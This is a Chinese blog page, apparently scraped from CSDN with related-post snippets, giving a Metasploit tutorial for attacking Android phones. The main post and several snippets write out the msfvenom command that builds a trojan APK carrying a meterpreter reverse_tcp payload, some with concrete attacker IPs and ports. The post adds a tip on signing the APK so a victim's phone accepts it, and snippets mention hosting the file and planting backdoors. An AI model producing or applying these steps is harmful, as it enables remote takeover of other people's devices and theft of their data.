利用Metasploit攻击Android

最新推荐文章于 2023-02-24 19:34:33 发布

weixin_30315435

最新推荐文章于 2023-02-24 19:34:33 发布

阅读量442

点赞数

文章标签：移动开发 shell

原文链接：http://www.cnblogs.com/wjvzbr/p/7569400.html

版权

首先我在Kali下生成一个Android的应用程序，即apk格式的文件，用到的命令是：

msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk

注释：-p：指的是在本次环境中攻击所使用的payload，这个payload就是将Android攻击成功之后的反弹连接发送到攻击者的终端上来；’

LHOOST与LPORT指的是本地反弹的ip地址与本地监听端口；

-R：表示要生成的文件类型；

> /root/rb.apk：表示生成文件的保存路径；

那么接下来就开始配置：

攻击端配置成功之后在手机端将之前生成好的apk文件导入手机中，然后供给端就开始exploit，则可以看出回话的连接状态：

选择连接会话，进入控制shell，则可以查看使得内容信息与版本信息：

【注意：在将Kali里面生成的apk文件直接导入手机时可能会发生错误，那是因为apk文件缺少授权，所以我们下载一个制作签名的软件，给此文件进行授权，则就可以导入了】

转载于:https://www.cnblogs.com/wjvzbr/p/7569400.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30315435

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Metasploit对安卓手机的攻击

andiao1218的博客

09-21

1157

首先要kali进行内网穿透，可参考http://www.cnblogs.com/sch01ar/p/7562954.html 首先生成一个apk木马命令：msfvenom -p android/meterpreter/reverse_tcp LHOST=外网IP LPORT=端口 R > /root/sch01ar.apk 启动msf，来监听反弹，命令为：msfcons...

Metasploit后门攻击android

2301_77778745的博客

04-26

436

之后攻击便完成了，这时候返回一个meterpreter可以执行各种命令，可以通过’？‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径，也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后，便可以开始监听，使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。

参与评论您还未登录，请先登录后发表或查看评论

6.Metasploit生成apk攻击Android实例

weixin_30417487的博客

07-03

587

Metasploit进阶第四讲生成Android apk文件 01 msfvenom基本参数 msfvenom介绍承接上回，staged/unstage payload如何利用？ msfvenom是msfpayload及msfencode的结合体，可利用msfvenom将payload封装为木马程序，并在目标机上执行，在本地监听上线。 msfvenom基本...

Metasploit对安卓手机进行控制

weixin_30785593的博客

05-26

380

1.in the server: msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.1.128LPORT=4444R> ./pentest.apkhttp://resources.infosecinstitute.com/mobile-device-penetration-testing/ useex...

Metasploit学习之渗透攻击之旅

习惯积淀的博客

01-08

241

文章目录渗透攻击之旅渗透攻击基础渗透流程全端口攻击载荷：暴力猜解目标开放的端口渗透攻击之旅渗透攻击基础 Metasploit框架中包含数百个模块，在MSF终端中运行show命令可以把所有模块显示出来。命令： show exploits 显示所有可用的渗透攻击模块 show auxiliary 显示所有的辅助模块以及它们的用途 show options 显示各个模块正确运行所需的各种设置。 ...

17. 利用Metasploit渗透Android应用程序

# 1. Android应用程序安全概述 ...这些漏洞可能导致应用程序易受攻击，造成用户信息泄露或其他安全问题。 1.3 渗透测试在Android应用程序安全中的作用渗透测试是评估Android应用程序安全性的重要手段，通过模

基于Ruby符号执行的Metasploit攻击流量提取

最新发布

03-24

2. **快速分析与流量提取**：利用符号执行技术，可以自动分析Metasploit攻击脚本的执行路径，快速识别出关键操作并提取对应的攻击流量。 3. **标记与属性记录**：在提取过程中，对攻击流量的不同部分进行标记，并...

在什么场景下可利用MSF攻击android

06-10

1. 利用已知的Android漏洞进行攻击，例如利用Android系统中的漏洞来执行代码，获取系统权限或者泄露敏感信息。 2. 利用Android设备的一些弱点进行攻击，例如利用设备上未经认证的服务或者协议来攻击目标系统。 3. ...

思考在什么场景下可利用MSF攻击android？

05-29

1. 利用 Android 设备上的漏洞进行远程代码执行攻击，可以通过 MSF 中的 exploit 模块实现。 2. 利用 Android 设备上的弱口令进行攻击，可以通过 MSF 中的 brute force 模块实现。 3. 利用 Android 设备上的反向...

Metasploit攻击流量提取：Ruby符号执行方法

"基于Ruby符号执行的Metasploit攻击流量提取" 本文主要探讨了一种基于Ruby符号执行技术来从Metasploit攻击框架中提取攻击流量的方法。Metasploit是一个广泛使用的开源渗透测试工具，由Ruby编程语言构建，它包含了...

metasploit-payloads, 针对不同Metasploit框架有效负载的统一存储库.zip

09-18

metasploit-payloads, 针对不同Metasploit框架有效负载的统一存储库 metasploit负载>这是针对不同的Metasploit框架有效负载的统一存储库，其中合并了这些存储库：C Windows/linux Meterpreters/android Meterpreters和负载pytho

利用MSF攻击Android

qq_45746768的博客

07-08

3891

利用Metasploit攻击Android

Kali Linux使用Metasploit生成木马入侵安卓系统

简介

02-24

8334

前言，前言这是我最难想出来的对，这是我最后一篇文章，周一我们开学了，漏洞实战怕实现不了，至少放假可以更文章，我们只放一天，提示：以下是本篇文章正文内容，下面案例可供参考时间不够了，所以不做演示了,所以再见。

Kali渗透测试：使用Metasploit对Web应用的攻击

Liu_Bruce的博客

05-15

3700

Kali渗透测试：使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多，这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证，从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本，它来自于DVWA，代码如下： <html> <body> <form name="ping" action="#" method="post"> &

使用Metasploit入侵安卓手机(超详细哦)

热门推荐

chengman3837的博客

03-29

1万+

本文原创作者：newbie，本文属i春秋原创奖励计划，未经许可禁止转载！ 1.环境准备: Kali2.0(msfVENOM、metasploit) 安卓手机 2.利用过程: 使用msfvenom生成apk木马 msfvenom -p android/meterpreter/rev...

利用metasploit对手机进行渗透实战

qq_52907838的博客

08-18

3281

第一步：用ifconfig命令查看本机ip地址第二步：用msfvenom -p命令生成apk木马文件具体命令为 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk 说明：lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP)，lport后面为自己规定的端口号，我规定的为8848，R为指定文件格式，后面接生成apk的

客户端渗透之——使用Metasploit渗透Android系统

冰河的专栏

01-24

4788

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86633320 可以创建一个新的APK文件，也可以将攻击载荷注入到一个现有的APK文件来攻击Android平台，这里我们使用第一种方法。 1.创建APK文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168....

利用Metasploit渗透Android手机

LYKymy的博客

04-01

3559

参考网址：https://blog.csdn.net/Aaron_Miller/article/details/80375807 实现内网穿透 Metesploit木马入侵

Metasploit（后渗透攻击：操作系统后门）

qq_41453632的博客

12-10

3694

在完成了权限提升之后，我们就应该建立后门（backdoor）了，以维持对目标主机的控制权，这样一来，即使我们所利用的漏洞被补丁程序修复，还可以通过后门继续控制目标系统。 1.Cymothoa后门 Cymothoa是一款可以将ShellCode注入现有进程（即插进程）的后门工具。借助这种注入手段，，他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序（进...